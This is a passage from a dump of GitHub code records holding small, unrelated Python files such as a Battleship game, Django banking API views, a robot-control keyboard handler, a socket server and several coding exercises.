place_ship(b, symbol, length, row, column, orientation):\n for i in range(0, length, 1):\n if orientation == 1:\n b[row + i][column] = symbol\n else:\n b[row][column + i] = symbol\n\n# Sets up all ships on a given board (fleet is a ship to length dictionary).\ndef set_up_all_ships(b, fleet):\n for k in fleet:\n ship_orientation, ship_row, ship_column = randomize()\n while is_free_to_place_ship(b, fleet[k], ship_row, ship_column, ship_orientation) == 0:\n ship_orientation, ship_row, ship_column = randomize()\n place_ship(b, k, fleet[k], ship_row, ship_column, ship_orientation)\n\n# Gets user input for coordinates. Subtracts 1 from raw input because of how arrays'\n# indices work in Python (0-9 rather than 1-10).\ndef get_input_from_player():\n success = False\n \n while not success:\n try:\n temp_row = int(input())\n temp_col = int(input())\n temp_row -= 1\n temp_col -= 1\n \n success = True\n except:\n print(\"Invalid input, Admiral. Try again.\")\n\n return temp_row, temp_col\n\n# Gets random input from ai.\ndef get_ai_input():\n temp_row = random.randint(0, 9)\n temp_col = random.randint(0, 9)\n return temp_row, temp_col\n\n# Takes in a board and a set of guess coordinates. If the coordinate has already been input or the coordinate is out\n# of bounds, returns a 1, otherwise, 0.\ndef invalid_input(b, row, column):\n if row < 0 or row > 9 or column < 0 or column > 9 or b[row][column] != '~':\n return 1\n return 0\n\n# Changes the goals board and normal board based on the row and column coordinate for a torpedo attack.\ndef alter_boards(board, goals, lives, ship_to_length, row, column):\n if goals[row][column] != '~':\n ship_to_length[goals[row][column]] -= 1\n lives -= 1\n if ship_to_length[goals[row][column]] == 0:\n print(\"The \" + str(ship_to_name[goals[row][column]]) + \" has been destroyed.\")\n goals[row][column] = 'H'\n board[row][column] = 'H'\n else:\n goals[row][column] = 'M'\n board[row][column] = 'M'\n return lives\n\n# Prints what happens when a winner is crowned.\ndef print_winner(winner, board):\n if winner == \"player\":\n print(\"You commanded well, admiral. Victory is yours!\")\n else:\n print(\"You can't win 'em all. Rendezvous back to base; let's win the next bout.\")\n print_board(board)\n\n# End of pre-written functions and global variables\n\n# - - - - - - - - - -\n\n# Welcome screen and printing of boards.\n\nprint(\"-------> WELCOME TO BATTLESHIP <-------\\nAdmiral, please type \\\"go\\\" to commence the game.\")\nready_or_not = input()\n\nwhile ready_or_not.lower() != \"go\":\n print(\"The fleet awaits your command. Type \\\"go\\\" to commence the game.\")\n ready_or_not = input()\n\n# Creates all boards.\nplayer_board = get_new_board()\nai_board = get_new_board()\nplayer_goals = get_new_board()\nai_goals = get_new_board()\n\nprint_boards(player_board, ai_board)\nprint(\"***OBJECTIVE***: You must sink the enemy fleet using skill and some guessing. Good luck, admiral!\")\n\n# Randomly set up ships, for both the player and the ai.\nset_up_all_ships(player_goals, ai_ship_to_length)\nset_up_all_ships(ai_goals, player_ship_to_length)\n\n# Loops until either the player's fleet or ai's fleet is destroyed.\nwhile player_lives > 0 and ai_lives > 0:\n # player's turn\n if turn % 2 == 1:\n print(\"Admiral, input a row and a column to fire torpedoes towards enemy vessels.\")\n input_row, input_column = get_input_from_player()\n while invalid_input(player_board, input_row, input_column) == 1:\n print(\"Invalid coordinate, admiral. Input another set of row and column coordinates.\")\n input_row, input_column = get_input_from_player()\n # at this point, input has been verified, and row and column coordinates are valid\n ai_lives = alter_boards(player_board, player_goals, ai_lives, ai_ship_to_length, input_row, input_column)\n # ai's turn\n else:\n input_row, input_column = get_ai_input()\n while invalid_input(ai_board, input_row, input_column) == 1:\n input_row, input_column = get_ai_input()\n # at this point, input has been verified, and row and column coordinates are valid\n player_lives = alter_boards(ai_board, ai_goals, player_lives, player_ship_to_length, input_row, input_column)\n # Prints both boards after the ai's turn (thus, each player will have gone once before the boards are printed).\n if turn % 2 == 0:\n print_boards(player_board, ai_board)\n turn += 1\n\n# Print winner of the game.\nif player_lives == 0:\n print_winner(\"ai\", ai_goals)\nelse:\n print_winner(\"player\", player_goals)","repo_name":"Quikks1lver/Battleship","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":9303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"41367079232","text":"import datetime\nfrom django.shortcuts import render\nfrom rest_framework import generics, permissions\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .serializer import *\nfrom .models import *\n\n# Create your views here.\n\n# class PersonGetView(generics.CreateAPIView):\n# serializer_class = PersonSerializer\n\n\nclass PersonView(generics.GenericAPIView):\n permission_classes = [\n permissions.IsAuthenticated,\n ]\n serializer_class = PersonSerializer\n\n def post(self, request, *args, **kwargs):\n try:\n user = self.request.user\n data_request = request.data\n bday = datetime.datetime(*[int(item) for item in data_request[\"birthday\"].split('/')]).strftime(\"%Y-%m-%d\")\n print(\"data_request : \",data_request)\n person = Person(\n user=user,\n name=data_request[\"name\"],\n lastname=data_request[\"lastname\"],\n ci=data_request[\"ci\"],\n birthday=bday,\n address=data_request[\"address\"],\n )\n print(\"person\", person)\n person.save()\n return Response(status=status.HTTP_201_CREATED)\n except:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n def get(self, request, *args, **kwargs):\n try:\n user = self.request.user\n query = Person.objects.get(user=user)\n result = self.get_serializer_class()(query)\n return Response(result.data)\n except:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\nclass CurrencyView(generics.ListAPIView):\n permission_classes = [\n permissions.AllowAny,\n ]\n serializer_class = CurrencySerializer\n queryset = Currency.objects.all()\n\n\nclass AccountView(generics.GenericAPIView):\n serializer_class = AccountSerializer\n \n def post(self, request, format=None):\n try:\n user = self.request.user\n data_request = request.data\n currency = Currency.objects.get(currency_name = data_request[\"currency\"])\n checker = Account.objects.filter(currency = currency, user=user).first()\n if checker is None:\n account = Account(\n user=user,\n currency=currency,\n )\n account.save()\n return Response(status=status.HTTP_201_CREATED)\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n except:\n return Response(status=status.HTTP_500_BAD_REQUEST)\n \nclass AccountListView(generics.ListAPIView):\n serializer_class = AccountSerializer\n\n def get_queryset(self):\n user = self.request.user\n query = Account.objects.filter(user=user)\n return query\n\n\nclass TransactionListView(generics.ListAPIView):\n serializer_class = TransactionSerializer\n\n def get_queryset(self):\n user = self.request.user\n user_accounts = Account.objects.filter(user=user)\n result = []\n for user_account in user_accounts:\n queryset1 = Transaction.objects.filter(origin=user_account)\n queryset2 = Transaction.objects.filter(destiny=user_account)\n result_aux = queryset1.union(queryset2, all=False)\n result += result_aux\n return list(set(result))\n\nclass TransactionView(generics.GenericAPIView):\n serializer_class = TransactionSerializer\n\n def post(self, request, *args, **kwargs):\n data_request = request.data\n user = self.request.user\n checker = Account.objects.filter(account_id = int(data_request['origin']),user=user.id).first()\n if checker is not None:\n origin = Account.objects.get(account_id = int(data_request['origin']))\n destiny = Account.objects.get(account_id = int(data_request['destiny']))\n currency = origin.currency\n transaction = Transaction(\n origin = origin,\n destiny= destiny,\n amount= int(data_request['amount']),\n transaction_currency = currency\n )\n transaction.save()\n return Response(status=status.HTTP_201_CREATED)\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n \n","repo_name":"DiegoBergara/test-ripio","sub_path":"mainDocker/api/myapi/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22300009532","text":"''' layouts:\n\t#window.verticalLayout_debug.addWidget(newBtn)\n\t\n\t#parentElem=window.QGridLayout_order\n\n\tif id==\"id_m1\":\n\t\tparentElem=window.verticalLayout_m1\n\telif id==\"id_magL\":\n\t\tparentElem=window.verticalLayout_magL\n\telse:\n\t\tparentElem=window.verticalLayout_magR\n'''\nclass class1: #hold for global access from threads\n\tkeys=[] #all keys pressing now\n\twindow=None\n\tbShow_verticalLayoutWidget_debug=True\n\tbShow_verticalLayoutWidget_help=False\n\tbShow_verticalLayout_manualControl_=False\n\tbFullScreen=False\n\tdef toggle_FullScreen():\n\t\tclass1.bFullScreen=not class1.bFullScreen\n\t\tif class1.bFullScreen:\n\t\t\tclass1.window.showFullScreen()\n\t\telse:\n\t\t\tclass1.window.showNormal()\n\tdef toggle_helpView():\n\t\tclass1.bShow_verticalLayoutWidget_help=not class1.bShow_verticalLayoutWidget_help\n\t\tif class1.bShow_verticalLayoutWidget_help:\n\t\t\tclass1.window.verticalLayout_help_.show()\n\t\telse:\n\t\t\tclass1.window.verticalLayout_help_.hide()\n\tdef toggle_debugView():\n\t\tclass1.bShow_verticalLayoutWidget_debug=not class1.bShow_verticalLayoutWidget_debug\n\t\tif class1.bShow_verticalLayoutWidget_debug:\n\t\t\tclass1.window.verticalLayout_debug_2.show()\n\t\telse:\n\t\t\tclass1.window.verticalLayout_debug_2.hide()\n\tdef toggle_manualControl():\n\t\tclass1.bShow_verticalLayout_manualControl_=not class1.bShow_verticalLayout_manualControl_\n\t\tif class1.bShow_verticalLayout_manualControl_:\n\t\t\tclass1.window.verticalLayout_manualControl_.show()\n\t\telse:\n\t\t\tclass1.window.verticalLayout_manualControl_.hide()\n\n\n\ndef closeThisElem(elem):\n\telem.hide()\ndef handleOpenDialog(self):#!TODO\n\t#self.button1 = QPushButton(\"Click me\")\n\t#self.button1.clicked.connect(partial(closeThisElem,self.button1))\n\t#self.addWidget(self.button1)\n\t#self.button1.show()\n\t\t#QMessageBox.warning(self,\"The \",\"123\",QMessageBox.Yes, QMessageBox.No)\n\twindow=class1.window\n\tif '_dialog' not in locals():\n\t\twindow._dialog = QDialog(self)\n\t\twindow._dialog.resize(400, 200)\n\t\twindow.labelD = QtWidgets.QLabel(window._dialog)\n\t\t#window.labelD.setGeometry(QtCore.QRect(80, 60, 47, 13))\n\t\twindow.labelD.setObjectName(\"label\")\n\t\twindow.labelD.setText(\"g5hy45h\")\n\t\twindow.labelD.show()\n\t\twindow._dialog.show() #cant close, only esc\n\t\t#time.sleep(3)\n\t\t#window._dialog.close()\n\telse:\n\t\twindow._dialog.hide()\n\t#self._dialog.raise_()\n\t#self._dialog.activateWindow()\n\t\t#self._dialog.exec() #freeze\n\nfrom pynput.keyboard import Key, Listener, KeyCode, Controller\nkeyboard = Controller()\n\n\n\ndef on_press(key): #https://pythonhosted.org/pynput/keyboard.html#monitoring-the-keyboard\n\tif( not (key in class1.keys) ):\n\t\tclass1.keys.append(key)\n\t#print(class1.keys)\n\t#print('{0} pressed'.format(key))\n\ndef mov_rel_x_10_sel():\n\tid_=class1.window.id_selected \n\tclass1.window.dType.SetPTPCmdEx_mon(api, id_, 7, 10, 0, 0, 0, 1)\ndef mov_rel_xn_10_sel():\n\tid_=class1.window.id_selected \n\tclass1.window.dType.SetPTPCmdEx_mon(api, id_, 7, -10, 0, 0, 0, 1)\t\n\ndef mov_rel_r_5_sel():\n\tid_=class1.window.id_selected \n\tclass1.window.dType.SetPTPCmdEx_mon(api, id_, 7, 0, 0, 0, 5, 1)\ndef mov_rel_rn_5_sel():\n\tid_=class1.window.id_selected \n\tclass1.window.dType.SetPTPCmdEx_mon(api, id_, 7, 0, 0, 0, -5, 1)\t\n\ndef on_release(key):\n\t#print(key)\n\t'''\n\tprint(key, end=\"\")\n\tif(hasattr(key, 'vk')):\n\t\tprint(\" \", key.vk) #key.vk - for numpad. also .KeyCode\n\telse:\n\t\tprint()\n\t'''\n\t'''\n\tKey.left\n\tKey.right\n\tKey.up\n\tKey.down\n\tKey.page_up\n\tKey.page_down\n\tKey.delete\n\tKey.end\n\t\n\tKey.num_lock\n\t\n\tKey.end\n\tKey.home\n\t\n\tKey.ctrl_l\n\tKey.shift\n\tKey.shift_r\n\tKey.space\n\t\n\tKey.backspace\n\t\n\t'''\n\t\n\t'''\n\tif hasattr(key, 'vk') and 96 <= key.vk <= 105:\n\t\tif(key=='1'):\n\t\t\tprint(1)\n\t\t\t\n\t\treturn True\n\t'''\n\t\n\tif( key in class1.keys ):\n\t\tclass1.keys.remove(key)\n\t\t#print(class1.keys)\n\t\n\tif(key==Key.left):\n\t\tmov_rel_x_10_sel()\n\tif(key==Key.right):\n\t\tmov_rel_xn_10_sel()\n\t\t\n\tif(key==Key.delete):\n\t\tmov_rel_r_5_sel()\t\t\n\tif(key==Key.delete):\n\t\tmov_rel_rn_5_sel()\t\n\n\n\tif(key==Key.backspace):\n\t\t#for i in range(9):\n\t\t#\tdobotSt=class1.window.dobotStates[i]\n\t\tdobotSt=class1.window.dobotStates[class1.window.id_selected]\n\t\t#if(dobotSt == None):\n\t\t#\tcontinue\n\t\t\n\t\tif(len(dobotSt.pos_hist)>0):\n\t\t\tpos=dobotSt.pos_hist.pop()\n\t\t\tprint(pos) #dobotSt.pos_hist\n\t\t\tdobotSt.setPosCursorXYZR ( pos )\n\t\t\t#TODO save load hist railL\n\t\t\t\n\t\t'''\n\t\ttry:\n\t\t\tpos=dobotSt.pos_hist.pop()\n\t\t\tprint(pos) #dobotSt.pos_hist\n\t\t\tdobotSt.setPosCursor( pos )\n\t\texcept:\n\t\t\tpass\n\t\t'''\t\t\n\t\n\n\t\n\tif(key is None):\n\t\tprint(\"! key None\")\n\t\treturn False\n\t\t\n\tif(key == Key.home):\n\t\tbtnStop_f(id_m1)\n\t\tbtnStop_f(id_magR)\n\t\tbtnStop_f(id_magL)\n\t\t#btnHome_f(id_magL)\n\t\tbtnHome_f(id_magR)\n\t\t#!! initial id_m1\n\t\treturn\n\tif(key == Key.insert):\n\t\tt01_m1_find_pivot_f()\n\t\treturn\n\t\t\n\n\n\t\n\tif key == KeyCode.from_char('c'):\n\t\tclass1.window.dobotStates[0].cursor_to_pos_selected()\n\t\t\n\tif key == KeyCode.from_char('p'):\n\t\tpass\n\ttry:\n\t\t#print('{0} release'.format(key))\n\n\t\tif(hasattr(key, 'char') and key.char.isdigit()):\n\t\t\tid_selected=int(key.char)\n\t\t\tif(id_selected==3):\n\t\t\t\tid_selected=0\n\t\t\n\t\t\t#print(id_selected)\n\t\t\tclass1.window.id_selected=id_selected #global nw here so sore in window\n\t\t\tclass1.window.widgetDraw1.update()\n\texcept:\n\t\tprint(\"! key handler err\") #@ test off num_lock, press num_5\n\t\n\tif key == Key.f1:\n\t\t#handleOpenDialog(class1.window)\n\t\tclass1.toggle_helpView()\n\t\t\n\telif key == Key.f12:\n\t\tclass1.toggle_FullScreen()\n\t\n\telif key == Key.f4:\n\t\tclass1.toggle_debugView()\n\t\n\telif key == Key.f5:\n\t\tclass1.toggle_manualControl()\n\t\t\n\telif key == Key.esc:\n\t\t# Stop listener\n\t\treturn False\n\n\ndef keyhandler():\n\twith Listener(on_press=on_press,on_release=on_release) as listener:\n\t\tlistener.join()","repo_name":"pavel-b-kr12/DoBot_multicontroll","sub_path":"dispenser_gift_py/ui.py","file_name":"ui.py","file_ext":"py","file_size_in_byte":5563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15066704446","text":"# phone number 555-GET-FOOD = 555-438-3663\ndef PhNum(PhoneNumber):\n Num= PhoneNumber.split('-')\n AreaCode= Num[0]\n NumEnd= Num[1:]\n Number= ''\n for n in NumEnd:\n for i in range (len(n)):\n if n[i] in 'ABC':\n Number= Number+ '2'\n elif n[i] in 'DEF':\n Number= Number+ '3' \n elif n[i] in 'GHI':\n Number= Number+ '4'\n elif n[i] in 'JKL':\n Number= Number+ '5'\n elif n[i] in 'MNO':\n Number= Number+ '6'\n elif n[i] in 'PQRS':\n Number= Number+ '7'\n elif n[i] in 'TUV':\n Number= Number+ '8'\n elif n[i] in 'WXYZ':\n Number= Number+ '9'\n Number= Number+'-'\n return AreaCode+'-'+Number[:-1] \n\nPhoneNumber= input(\"Enter Phone Number: \")\nNewNumber=PhNum(PhoneNumber)\nprint(NewNumber)\n \n ","repo_name":"tiwa2022/Lab5","sub_path":"phonenumber.py","file_name":"phonenumber.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22773619004","text":"# A / X = Rock\r\n# B / Y = Paper\r\n# C / Z = Scissors\r\n\r\n# Rock > Scissors\r\n# Scissors > Paper\r\n# Paper > Rock\r\n\r\ndef read_in_file_to_list(filename):\r\n with open(filename) as file:\r\n data = file.readlines()\r\n return data\r\n\r\ndef determine_points(opponent_choice, player_choice):\r\n point_dict = {'X': 1, 'Y': 2, 'Z': 3}\r\n points = point_dict[player_choice]\r\n\r\n if ((opponent_choice == 'A') & (player_choice == 'X')) | ((opponent_choice == 'B') & (player_choice == 'Y')) | ((opponent_choice == 'C') & (player_choice == 'Z')):\r\n return points + 3 \r\n elif (opponent_choice == 'A') & (player_choice == 'Y'):\r\n return points + 6\r\n elif (opponent_choice == 'B') & (player_choice == 'Z'):\r\n return points + 6\r\n elif (opponent_choice == 'C') & (player_choice == 'X'):\r\n return points + 6\r\n else:\r\n return points + 0\r\n\r\ndef get_total(data):\r\n total = 0\r\n for round in data:\r\n seperate_inputs = round.split(' ')\r\n total += determine_points(seperate_inputs[0], seperate_inputs[1].strip('\\n'))\r\n return total\r\n\r\ndef main():\r\n data = read_in_file_to_list(\"data/input.txt\")\r\n total = get_total(data)\r\n print(total)\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"jimmybunter01/Advent-of-Code-2022","sub_path":"Day 2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"31609434949","text":"class RestaurnatTable:\n menu={\n 'pizza': 10000,\n 'cola' : 1000,\n 'apple juice' : 2000,\n 'hamburger' : 4500,\n 'fried potato' : 1500\n }\n\n def __init__(self) :\n self.total=0\n self.orders=[]\n\n def addOrder(self,order):\n self.orders.append(order)\n self.total+=self.menu[order]\n\n def printBill(self):\n for order in self.orders:\n print(f'{order} : {self.menu[order]}')\n\n print(f'total price is - {self.total}')\n\n\ndef startProgram():\n table=RestaurnatTable()\n\n while True :\n order = input('order : ')\n table.addOrder(order)\n\n another = input('would you like to add more ? y/n : ')\n\n if another == 'y' :\n continue\n if another == 'n' :\n table.printBill()\n break\n\nstartProgram()","repo_name":"PaingThetKo/Python-Learning","sub_path":"Restaurant.py","file_name":"Restaurant.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"39"} +{"seq_id":"25419395316","text":"import json\nimport random\nfrom random import randint\nfrom faker import Faker\nfrom scipy.stats import skewnorm\nimport collections\nimport math\nfake = Faker('en_US')\n\n# use data_generator.data() to access data\nclass data_generator:\n position = ['GK', 'CB', 'CM', 'RM', 'LM', 'LW', 'RW', 'ST']\n teams = {'ANKARA': ['Gençlerbirliği', 'Ankara Demirspor', 'Ankaragücü', 'Muhafızgücü', 'Harp Okulu'],\n 'Premier League': ['Arsenal', 'Aston Villa', 'Barnsley', 'Birmingham City', 'Blackburn Rovers'],\n 'La Liga': ['Real Madrid', 'Barcelona', 'Atlético Madrid', 'Athletic Bilbao', 'Valencia'],\n 'Serie A': ['Atalanta', 'Benevento', 'Bologna', 'Cagliari', 'Crotone'],\n 'Ligue 1': ['Angers', 'Bordeaux', 'Brest', 'Dijon', 'Lens']}\n league_nation = {'ANKARA': 'Turkey', \n 'Premier League': 'England',\n 'La Liga': 'Spain',\n 'Serie A': 'Italy',\n 'Ligue 1': 'France'}\n data = list()\n a = 4\n \n def __init__(self, size: int, league_nation: list = None, teams: dict = None, outfile: str = 'players.json'):\n \"\"\"\n Initialization can takes up to 4 arguments, three of them can be empty and defaulted to the ones above\n\n args:\n size: an integer of desired size of the dataset\n nationality: a list of nations, can be any length\n teams: a dictionaty of league and teams, E.g.: {'league1': [team1, team2, team3]}\n outfile: str, name of the output file\n \"\"\"\n self.outfile = outfile\n if league_nation != None:\n self.league_nation = league_nation\n\n if teams != None:\n self.teams = teams\n\n self.leagues = [key for key in self.teams.keys()]\n self.nationality = [self.league_nation[key] for key in self.leagues]\n self.outfile = outfile\n self.size = size\n self.generate()\n\n def generate(self) -> list:\n \"\"\"\n generate can be called by outside callers to generate multiple different datasets based on same\n league, team, nation information and distribution\n \"\"\"\n self.clear_data()\n for i in range(self.size):\n self.data.append(self.generate_one())\n return self.data\n\n def generate_one(self) -> dict:\n \"\"\"\n generate can be called by outside function to generate multiple different datasets\n \"\"\"\n player = collections.defaultdict()\n player['name'] = fake.unique.name()\n player['league'] = self.leagues[randint(0, len(self.leagues)-1)]\n player['team'] = self.teams[player['league']][randint(0, len(self.teams[player['league']])-1)]\n\n if randint(1, 10) <= 5:\n player['na'] = self.league_nation[player['league']]\n else:\n player['na'] = self.nationality[randint(0, len(self.nationality)-1)]\n\n player['rating'] = self.generate_rating()\n player['pos'] = self.position[randint(0, len(self.position)-1)]\n return player\n\n def generate_rating(self):\n rt = math.floor(skewnorm.rvs(self.a)*10)\n if rt > 30:\n return 100\n else:\n return rt + 70\n\n\n def clear_data(self):\n self.data = list()\n\n def export(self):\n \"\"\"\n export the generated data to the output file name as a json file.\n \"\"\"\n with open(self.outfile, 'w') as out:\n json.dump(self.data, out)\n return\n \n","repo_name":"SkyZhangT/project-soccer-team","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"27897399099","text":"class Solution:\n def isHappy(self, n): \n sum_sq = 0\n possibles = [1, 10, 100, 1000]\n while sum_sq not in possibles:\n new_n = [int(i)**2 for i in str(n)]\n sum_sq = sum(new_n)\n n = sum_sq\n if n == 145:\n return False\n else:\n return True\n","repo_name":"Rohit0301/Compititive_programming_code","sub_path":"Leetcode/Happy number/HappyNumber.py","file_name":"HappyNumber.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"39"} +{"seq_id":"3439539752","text":"import bisect\nfor _ in range(int(input())):\n n=int(input())\n l=[int(ord(i)) for i in input()]\n p=[67,71,73,79,83,89,97,101,103,107,109,113]\n s=''\n for i in l:\n mi=999\n for j in p:\n c=abs(j-i)\n if c bool:\n m = len(matrix)\n if not m:\n return False\n\n n = len(matrix[0])\n\n left, right = 0, m * n - 1\n\n while left <= right:\n mid = left + (right - left) // 2\n i, j = divmod(mid, n)\n mid_val = matrix[i][j]\n\n if mid_val == target:\n return True\n else:\n if target < mid_val:\n right = mid - 1\n else:\n left = mid + 1\n\n return False\n\n\nA = [[1, 3, 5, 7], [10, 11, 16, 20], [23, 30, 34, 50]]\na = Solution()\nprint(a.searchMatrix(A, 3))\n","repo_name":"jixinfeng/leetcode-soln","sub_path":"python/074_search_a_2d_matrix.py","file_name":"074_search_a_2d_matrix.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22304926694","text":"# Author: Karina Kallas\n# Project: Assignment 8 - Microservice for Partner\n# Description: Saves recent conversions for unit converter.\n# server.py handles messages from client_handler, saves recent searches,\n# and returns recent searches.\n\n# ----------------------------------------------------------------------------------------\n#\n# IMPORTS\n#\n# ----------------------------------------------------------------------------------------\nimport socket\nimport threading\nfrom collections import deque\n\n\n# ----------------------------------------------------------------------------------------\n#\n# CONNECTION INFORMATION\n#\n# ----------------------------------------------------------------------------------------\n\"\"\"\n- Header allows to limit size of bytes being recieved.\n- gethostbyname() will automatically connect to local.\n\"\"\"\nHEADER = 64 # BYTES\nPORT = 5050\nSERVER = socket.gethostbyname(socket.gethostname())\nADDR = (SERVER, PORT)\nFORMAT = 'utf-8'\n\n\n# ----------------------------------------------------------------------------------------\n#\n# MESSAGES, COMMON VARIABLES, AND SAVED QUEUE (saved_q)\n#\n# ----------------------------------------------------------------------------------------\n\"\"\"\n- Saved messages for communication\n- Saved variables that can be changed by client.\n\"\"\"\nstart_msg = \"Server is starting....\"\ndisconnect_msg = \"quit\"\nreceive_msg = \"send\"\nempty = \"empty\"\nnum = 3\nsaved_q = deque()\n\n\n# ----------------------------------------------------------------------------------------\n#\n# SERVER SET UP WITH SOCKET\n#\n# ----------------------------------------------------------------------------------------\n\"\"\"\nBind to local host.\n\"\"\"\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(ADDR)\n\n\n# ----------------------------------------------------------------------------------------\n#\n# HANDLE CLIENT\n#\n# ----------------------------------------------------------------------------------------\ndef handle_client(conn, addr):\n # alerts to new client connection\n print(f\"NEW CONNECTION: {addr} connected.\")\n\n connected = True\n while connected:\n # set up for reading message\n msg_length = conn.recv(HEADER).decode(FORMAT)\n if msg_length:\n msg_length = int(msg_length)\n msg = conn.recv(msg_length).decode(FORMAT)\n\n # please use this for clean disconnect to avoid error messages\n if msg == disconnect_msg:\n print(f\"Quit request received:\", disconnect_msg)\n msg = empty\n message = msg.encode(FORMAT)\n conn.send(message)\n connected = False\n\n # client used \"receive\" and wants saved searches returned\n if msg == receive_msg:\n msg = \"\"\n for item in saved_q:\n msg += f\" {item},\"\n message = msg.encode(FORMAT)\n conn.send(message)\n\n # client has sent a recent conversion to save\n else:\n #\n print(msg)\n saved_q.append(msg)\n print(\"current queue:\", saved_q)\n if len(saved_q) > num:\n saved_q.popleft()\n print(\"dequeued:\", saved_q)\n msg = empty\n message = msg.encode(FORMAT)\n conn.send(message)\n\n # can be removed - for server side only\n print(f\"We have received and processed the following message: \\n {msg}\")\n\n conn.close()\n\n\n# ----------------------------------------------------------------------------------------\n#\n# START: LISTEN AND THREAD\n#\n# ----------------------------------------------------------------------------------------\ndef start():\n server.listen()\n print(f\"Server is listening on: {SERVER}\")\n while True:\n conn, addr = server.accept()\n thread = threading.Thread(target=handle_client, args=(conn, addr))\n thread.start()\n\n # This prints how many client connections.\n # Minus 1 from active threads for this server start thread.\n print(f\"ACTIVE CONNECTIONS: {threading.activeCount()-1}\")\n\n\n# ----------------------------------------------------------------------------------------\n#\n# START MESSAGE / CALL START FUNCTION\n#\n# ----------------------------------------------------------------------------------------\nprint(start_msg)\nstart()","repo_name":"kallka/CS361-Microservice-SaveRecent","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"33638297505","text":"from json import loads\na = open(\"repaso/AM1/practico7.json\")\ns = a.read()\nlista = loads(s)\n\nlistaLenguajes = []\nfor persona in lista:\n listaLenguajes += persona[\"languages\"] # acumulo todas las listas en una sola\n\nconjuntoLenguajes = set(listaLenguajes) # eliminar los repetidos al convertir en conjunto\n\n# print(listaLenguajes, len(listaLenguajes))\n# print(conjuntoLenguajes, len(conjuntoLenguajes))\n\nlistaLenguajesSinRepetir = list(conjuntoLenguajes) # vuelvo a convertir a lista para recorrer\n\nlistaResultados = []\nmayor = 0\nfor lenguaje in listaLenguajesSinRepetir:\n # d = {lenguaje: listaLenguajes.count(lenguaje)}\n # listaResultados.append(d)\n contador = listaLenguajes.count(lenguaje)\n if contador > mayor:\n mayor = contador\n lenguajeMasHablado = lenguaje\n\nprint(lenguajeMasHablado, mayor)\n\n\na.close()\n","repo_name":"pablokan/22prog1","sub_path":"repaso/AM1/pr7.py","file_name":"pr7.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16162946604","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\n\nclass Graph:\n def __init__(self):\n pass\n\n def graph_plot(self, data, headers, name_x, name_y):\n years = list(range(1990, 2020))\n\n for i, sublist in enumerate(data):\n # Extract data from sublist and convert to a numpy array\n values = sublist[0][0].split()\n x = np.arange(1, len(values) + 1)\n y = np.array(values, dtype=float)\n\n plt.title(headers[i])\n plt.xlabel(name_x)\n plt.ylabel(name_y)\n\n plt.scatter(x, y)\n m, b = np.polyfit(x, y, 1)\n slope = (m * x) + b\n plt.plot(x, slope)\n plt.xticks(x[::3], years[::3])\n plt.show()\n","repo_name":"JojayD/lab-3","sub_path":"Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"71998196593","text":"# Interview Question #8\n#\n# Construct an in-place algorithm to reverse a linked list!\n\nclass Node:\n\n def __init__(self, data):\n self.data = data\n self.next_node = None\n\n def __repr__(self):\n return str(self.data)\n\n\nclass LinkedList:\n\n def __init__(self):\n self.head = None\n self.num_of_nodes = 0\n\n # O(N) running time complexity\n def reverse(self):\n current_node = self.head\n previous_node = None\n\n while current_node is not None:\n next_node = current_node.next_node\n current_node.next_node = previous_node\n previous_node = current_node\n current_node = next_node\n\n self.head = previous_node\n\n def insert_start(self, data):\n self.num_of_nodes += 1\n new_node = Node(data)\n\n if self.head is None:\n self.head = new_node\n else:\n new_node.next_node = self.head\n self.head = new_node\n\n def insert_end(self, data):\n self.num_of_nodes += 1\n new_node = Node(data)\n\n if self.head is None:\n self.head = new_node\n else:\n actual_node = self.head\n\n while actual_node.next_node is not None:\n actual_node = actual_node.next_node\n\n actual_node.next_node = new_node\n\n def size_of_list(self):\n return self.num_of_nodes\n\n def traverse(self):\n\n actual_node = self.head\n\n while actual_node is not None:\n print(actual_node)\n actual_node = actual_node.next_node\n\n def remove(self, data):\n\n if self.head is None:\n return\n\n actual_node = self.head\n previous_node = None\n\n while actual_node is not None and actual_node.data != data:\n previous_node = actual_node\n actual_node = actual_node.next_node\n\n if actual_node is None:\n return\n\n if previous_node is None:\n self.head = actual_node.next_node\n else:\n previous_node.next_node = actual_node.next_node\n\n\nif __name__ == '__main__':\n\n linked_list = LinkedList()\n\n insertionList = [12, 122, 3, 